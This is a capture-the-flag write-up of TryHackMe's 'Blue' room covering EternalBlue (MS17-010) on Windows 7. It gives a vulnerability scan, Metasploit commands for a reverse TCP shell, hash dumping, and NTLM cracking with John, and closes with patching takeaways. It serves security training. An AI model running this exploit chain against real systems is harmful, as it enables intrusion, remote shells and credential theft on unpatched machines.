Skip to content

TryHackMe: Blue — EternalBlue (MS17-010) Exploitation

Platform: TryHackMe  |  Difficulty: Easy  |  OS: Windows 7 Overview The "Blue" room walks through exploiting the infamous EternalBlue vulnerability (MS17-010), the same exploit used in the WannaCry ransomware attack.…

Platform: TryHackMe  |  Difficulty: Easy  |  OS: Windows 7

Overview

The “Blue” room walks through exploiting the infamous EternalBlue vulnerability (MS17-010), the same exploit used in the WannaCry ransomware attack. This room is a foundational exercise in understanding SMB vulnerabilities and why unpatched systems remain dangerous years after public disclosure.

Reconnaissance

nmap -sV -sC --script=vuln 10.10.x.x

The scan reveals SMBv1 is enabled and confirms the system is vulnerable to MS17-010 via the smb-vuln-ms17-010 NSE script.

Exploitation

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST YOUR_TUNNEL_IP
set PAYLOAD windows/x64/shell/reverse_tcp
run

After obtaining a shell, we migrate to a stable process and dump hashes:

run post/multi/manage/shell_to_meterpreter
hashdump

Credential Cracking

Using John with the rockyou wordlist against the extracted NTLM hash:

john --wordlist=rockyou.txt --format=NT hash.txt

Key Takeaways

  • MS17-010 remains exploitable on unpatched, legacy Windows systems
  • Disabling SMBv1 and applying MS17-010 patches is non-negotiable
  • Process migration is critical for stable post-exploitation sessions
Hire Me